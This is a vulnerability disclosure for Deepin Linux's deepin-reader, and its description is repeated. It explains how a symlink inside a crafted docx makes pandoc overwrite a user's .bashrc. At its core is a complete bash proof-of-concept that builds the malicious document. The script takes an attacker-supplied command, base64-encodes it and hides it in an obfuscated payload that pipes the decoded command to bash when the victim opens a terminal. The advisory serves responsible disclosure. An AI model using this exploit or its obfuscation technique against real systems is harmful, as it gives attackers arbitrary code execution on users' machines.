Summary
Deepin Linux's default document reader "deepin-reader" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document.
Details
Deepin-reader is the default document reader for the Operating System Deepin Linux. The deepin-reader performs some shell command operations while dealing with docx document format.
-
When opening a docx document , deepin-reader creates a temporary directory under /tmp and place the docx document under the directory
-
Then deepin-reader calls the "unzip" shell command to extract the docx file
-
After the extraction process, deepin-reader calls "pandoc" command to convert the docx file to an html file named "temp.html" under word/ directory (created when the docx file is extracted with unzip).
The command will look something like this, "pandoc temp.docx -o word/temp.html
-
Then deepin-reader will try to convert that html file to pdf and opens the pdf.
This is what happens when we open a docx file in Deepin Linux OS.
This behavior can be exploited by placing a symlink named word/temp.html inside a crafted malicious docx pointing to any file inside the target system.
So, while opening the docx file, pandoc will write to the system file that the symlink word/temp.html is pointing to..
This is a File overwrite vulnerability.
A Remote Code Execution can be achieved by overwriting files like .bash_rc, .bash_login etc. Rce will be triggered when the user opens the terminal.
PoC
The below code is a PoC exploit for the issue.
#!/bin/bash
myBanner(){
echo "
╔╦╗┌─┐┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐
║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘
═╩╝└─┘└─┘┴ ┴┘└┘ ╩╚═└─┘┴ ┴─┴┘└─┘┴└─
╦═╗╔═╗╔═╗ ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐
╠╦╝║ ║╣ ║╣ ┌┴┬┘├─┘│ │ ││ │
╩╚═╚═╝╚═╝ ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴
0-day
[Affected Operating System: Deepin Linux]
-by Febin (@febin_nj)
"
}
checkPandoc(){
if [ $(which pandoc) ]
then
echo "[+] Pandoc is installed!"
else
echo "[-] Pandoc is not installed! Install pandoc to run this exploit.."
exit
fi
}
mainProgram(){
printf "
[ This Exploit will craft a malicious document (.docx) from the specified TEXT file and store the malicious docx under output/ directory ]
"
mkdir output 2>/dev/null
printf " [>] Path to your TEXT file (default = ./sample.txt): "
read html_file
html_file=${html_file:-./sample.txt}
printf " [>] Enter the target username: "
read username
printf " [>] Enter the oneliner command to execute on target: "
read cmd
if [ -e "$html_file" ]
then
cp "$html_file" out.html
else
echo "[-] The specified txt file doesn't exist!"
exit
fi
b64cmd=$(echo "$cmd"|base64)
payload="<p>/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #</p>"
echo "${payload}$(printf '\n') $(cat out.html)" > out.html
pandoc out.html -o output/mal.docx
#pandoc output/mal.docx -o output/mal.html
rm -rf out.html
mkdir word 2>/dev/null
ln -s /home/${username}/.bashrc word/temp.html
zip -u -y output/mal.docx word/temp.html >/dev/null
rm -rf word/
echo "[+] Malicious document is written to: $(realpath output/mal.docx)"
}
myBanner
checkPandoc
mainProgram
Impact
This is a File overwrite vulnerability.
A Remote Code Execution can be achieved by overwriting files like .bash_rc, .bash_login, etc. Rce will be triggered when the user opens the terminal.
febinrev Reporter
Summary
Deepin Linux's default document reader "deepin-reader" software suffers from a serious vulnerability due to a design flaw that leads to Remote Command Execution via crafted docx document.
Details
Deepin-reader is the default document reader for the Operating System Deepin Linux. The deepin-reader performs some shell command operations while dealing with docx document format.
When opening a docx document , deepin-reader creates a temporary directory under /tmp and place the docx document under the directory
Then deepin-reader calls the "unzip" shell command to extract the docx file
After the extraction process, deepin-reader calls "pandoc" command to convert the docx file to an html file named "temp.html" under word/ directory (created when the docx file is extracted with unzip).
The command will look something like this, "pandoc temp.docx -o word/temp.html
Then deepin-reader will try to convert that html file to pdf and opens the pdf.
This is what happens when we open a docx file in Deepin Linux OS.
This behavior can be exploited by placing a symlink named word/temp.html inside a crafted malicious docx pointing to any file inside the target system.
So, while opening the docx file, pandoc will write to the system file that the symlink word/temp.html is pointing to..
This is a File overwrite vulnerability.
A Remote Code Execution can be achieved by overwriting files like .bash_rc, .bash_login etc. Rce will be triggered when the user opens the terminal.
PoC
The below code is a PoC exploit for the issue.
Impact
This is a File overwrite vulnerability.
A Remote Code Execution can be achieved by overwriting files like .bash_rc, .bash_login, etc. Rce will be triggered when the user opens the terminal.